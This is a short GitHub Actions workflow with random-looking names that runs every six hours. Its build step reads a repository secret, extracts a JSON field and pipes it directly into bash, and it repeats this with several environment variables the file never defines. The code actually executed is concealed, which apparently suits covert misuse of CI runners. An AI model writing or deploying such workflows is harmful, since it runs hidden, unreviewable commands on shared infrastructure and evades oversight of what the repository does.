name: qichosoner

on:
  workflow_dispatch:
  schedule:
    - cron: '42 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qichosoner
        env:
          plro1: ${{ secrets.plro1 }}
        run: |
          echo $plro1 | jq -r .sb2 | /bin/bash
          echo $l44680 | jq -r .gk24 | /bin/bash
          echo $m5 | jq -r .sfkb23575 | /bin/bash
          echo $vo6 | jq -r .qfybz1 | /bin/bash

